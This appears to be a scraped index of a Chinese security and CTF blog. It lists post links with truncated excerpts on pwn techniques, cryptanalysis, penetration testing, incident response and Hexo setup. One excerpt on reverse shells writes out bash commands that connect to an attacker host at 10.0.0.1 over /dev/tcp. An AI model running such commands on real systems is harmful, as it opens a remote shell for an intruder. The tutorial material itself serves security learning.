introspelliam / introspelliam.github.io Goto Github PK

https://introspelliam.github.io/about/

Try your best!

https://introspelliam.github.io/2018/03/20/ops/%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E9%A2%98%E7%9B%AE%E6%90%AD%E5%BB%BA/

其实最近做题有一些感触，觉得在自己服务器上搭建题目可能比较关键，常见的需要搭建的题目大概分为三大类：crypto、pwn、web。web搭建比较复杂，运维也很困难，有时候权限问题就会让运维着痛不欲生，而且一般来说做题的时候不太可能会拿到赛题；crypto有些赛题会给出一些代码，然后可以在内部运行，但也有可能不给代码，让你自己琢磨，这些都得靠你自己的思路；pwn题一般会给源码或者可执行文件，所以可以

test

https://introspelliam.github.io/2018/04/03/%E7%BA%BF%E6%80%A7%E5%88%86%E6%9E%90%E6%B3%95/

0x00 概述线性分析法、差分分析法作为SPN(Substitution Permutation Network)的常用解法，一直让密码学家痴迷。最近也因为0ctf的一些密码学题目，对线性分析法有了一定的了解，并想写篇博客将具体内容详细展示！ 0x01 SPN网络介绍首先我们来看看这个spn网络 每轮都包含3个步骤：substitution（代替）、permutation（置换）、key-mix

asdfasgasgdasdg

https://introspelliam.github.io/2017/08/04/pwn/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2/

1. 格式化字符串定义格式化字符串，是一些程序设计语言在格式化输出API函数中用于指定输出参数的格式与相对位置的字符串参数，例如C、C++等程序设计语言的printf类函数，其中的转换说明（conversion specification）用于把随后对应的0个或多个函数参数转换为相应的格式输出；格式化字符串中转换说明以外的其它字符原样输出。 2. POSIX标准下的printf函数2.1 格式化占

asdfasg

https://introspelliam.github.io/tags/

Try your best!

https://introspelliam.github.io/2017/08/07/pwn/linux%E4%B8%8Bsystem-execve-execl-%E5%87%BD%E6%95%B0%E4%BD%BF%E7%94%A8%E8%AF%A6%E8%A7%A3/

本节详细可参考http://www.cnblogs.com/akira90/archive/2012/12/05/2802809.html 1. execve函数12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455 相关函数： fork，execl，

https://introspelliam.github.io/2017/12/09/web/%E5%8F%8D%E5%BC%B9Shell/

假设攻击端为10.0.0.1，接收端口为8080 服务器端为10.0.0.2 1、Bash关于bash中的重定向知识，可以参考shell之后的操作 服务器端： 1bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 1bash -c 'sh -i &>/dev/tcp/10.0.0.1/8080 0>&1&a

https://introspelliam.github.io/2017/12/05/python%E9%9D%99%E6%80%81%E7%BC%96%E8%AF%91/

0. 前言为什么要将python编译器静态编译，主要有以下几个目的： 在其他不具备python环境下的主机上运行python程序 在不具备相同python库的主机上运行python程序 1. 工具集到目前为止我找到了两个工具集合： 1.1 静态编译的python解释器这是pts大佬的一个工程 https://github.com/pts/staticpython ， 在该工程中，大佬给出了静态

https://introspelliam.github.io/2017/08/06/pwn/%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E7%BA%A6%E5%AE%9A/

1、windows 64位调用约定windows64 位的调用很是奇怪，因为它不是通过栈来传参，而是通过寄存器来传参！ 最为常见的是，当参数只有一个的时候，一般是选用rcx来传递参数！ 2、Linux 32位调用约定Linux 32位的系统调用时通过int 80h来实现的，eax寄存器中为调用的功能号，ebx、ecx、edx、esi等等寄存器则依次为参数。下面我们来看看hello world程序：

https://introspelliam.github.io/2017/11/15/web/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%BB%8F%E9%AA%8C%E4%B9%8B%E8%B0%88/

1,分析目标网站内容及功能 (1) 首先确定网站采用何种语言编写.或者是否有混用的情况.此处可以通过查看网站源文件,观察网站链接,捕获提交请求等方式获取. (2) 爬行网站目录,使用工具对网站目录进行爬行,可以辅助上一步让结果更加精准.将爬行结果存档,如果可以,此处应分析出网站是否使用通用程序,如果是,记录下来.进行下一步. (3) 根据上一步的爬行结果,对网站根目录或者关键目录进行暴

https://introspelliam.github.io/2018/03/27/hexo/hexo%E4%BD%BF%E7%94%A8hexo-math%E6%8F%92%E4%BB%B6%E6%94%AF%E6%8C%81MathJax/

MathJax是使用LaTeX方式输入数学公式的好工具。Hexo虽然可以直接使用mathjax，但是存在一些不方便之处。使用hexo-math这个插件可以大大方便使用。使用Hexo 3.2.0，主题NexT 5.0.1，hexo-math 3.0.0安装方式如下 在hexo安装目录下执行 1npm install hexo-math --save 然后编辑站点根目录下的_config.yml，添加

https://introspelliam.github.io/2017/12/05/web/%E5%AE%89%E5%85%A8%E5%BA%94%E6%80%A5%E6%8E%92%E6%9F%A5%E6%89%8B%E5%86%8C/

1 事件分类常见的安全事件： Web入侵：挂马、篡改、Webshell 系统入侵：系统异常、RDP爆破、SSH爆破、主机漏洞 病毒木马：远控、后门、勒索软件 信息泄漏：拖裤、数据库登录（弱口令） 网络流量：频繁发包、批量请求、DDOS攻击 2 排查思路一个常规的入侵事件后的系统排查思路： 2.1 文件分析 a) 文件日期、新增文件、可疑/异常文件、最近使用文件、浏览器下载文件 b) Webshe

https://introspelliam.github.io/2017/11/15/web/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%BB%BC%E8%BF%B0/

零、前言渗透测试在未得到被测试方授权之前依据某些地区法律规定是违法行为。 这里我们提供的所有渗透测试方法均为（假设为）合法的评估服务，也就是通常所说的道德黑客行为（Ethical hacking），因此我们这里的所有读者应当都是Ethical Hackers，如果您还不是，那么我希望您到过这里后会成为他们中的一员 ；）这里，我还想对大家说一些话：渗透测试重在实践，您需要一颗永不言败的心和一个有着活

https://introspelliam.github.io/2017/09/30/linux%E7%A8%8B%E5%BA%8F%E7%9A%84%E5%B8%B8%E7%94%A8%E4%BF%9D%E6%8A%A4%E6%9C%BA%E5%88%B6/

操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险，包括DEP、ASLR等。在编写漏洞利用代码的时候，需要特别注意目标进程是否开启了DEP（Linux下对应NX）、ASLR（Linux下对应PIE）等机制，例如存在DEP（NX）的话就不能直接执行栈上的数据，存在ASLR的话各个系统调用的地址就是随机化的。 一、checksecchecksec是一个脚本软件，也就是用脚本写的一个

https://introspelliam.github.io/2018/07/09/NexT%E4%B8%BB%E9%A2%98%E4%B8%AD%E9%9B%86%E6%88%90gitalk%E8%AF%84%E8%AE%BA%E7%B3%BB%E7%BB%9F/

本文记录NexT主题中添加gitalk评论系统的步骤。gitalk：一个基于 Github Issue 和 Preact 开发的评论插件详情Demo可见：https://gitalk.github.io/ 1. Register Application在GitHub上注册新应用，链接：https://github.com/settings/applications/new参数说明：Applicat

https://introspelliam.github.io/categories/

Try your best!

https://introspelliam.github.io/2017/08/03/pwn/gdb%E7%9A%84%E8%B0%83%E8%AF%95%E4%B8%8E%E4%BD%BF%E7%94%A8/

1. 调试的快捷键peda带有的功能，直接输入命令，其就会给予提示（如果不是这样，基本上也是该命令就可以不带参数）。这儿就不多做介绍 1.1 基础的调试快捷键 s step，si步入 n 执行下一条指令 ni步入 b 在某处下断点，可以用 b * adrress b function_name info b 查看断点信息 delete 1删除第一个断点 c 继续 r 执行 disas

https://introspelliam.github.io/2018/07/09/hexo/NexT%E4%B8%BB%E9%A2%98%E4%B8%AD%E9%9B%86%E6%88%90gitalk%E8%AF%84%E8%AE%BA%E7%B3%BB%E7%BB%9F/

本文记录NexT主题中添加gitalk评论系统的步骤。gitalk：一个基于 Github Issue 和 Preact 开发的评论插件详情Demo可见：https://gitalk.github.io/ 1. Register Application在GitHub上注册新应用，链接：https://github.com/settings/applications/new参数说明：Applicat